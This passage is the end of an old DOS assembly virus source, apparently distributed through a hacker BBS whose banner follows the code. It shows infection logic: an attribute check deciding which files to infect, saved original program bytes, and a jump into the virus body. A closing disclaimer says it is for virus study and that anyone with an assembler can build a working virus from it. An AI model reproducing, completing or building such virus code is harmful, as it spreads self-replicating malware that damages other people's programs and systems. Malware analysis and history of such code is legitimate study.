int 21h pop ds jb Bad_Attr ; Error - don't infect test cx,4 ; System-Attr? jnz Bad_Attr ; Yes, don't infect clc ret Bad_Attr: stc ret First_bytes: int 20h ; First bytes of orig. program - here just 'Go to DOS' dw (?) mov bx,cs ; Overwrites the begin add bx,[102h] push bx mov bx,offset VirBegin push bx retf ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; |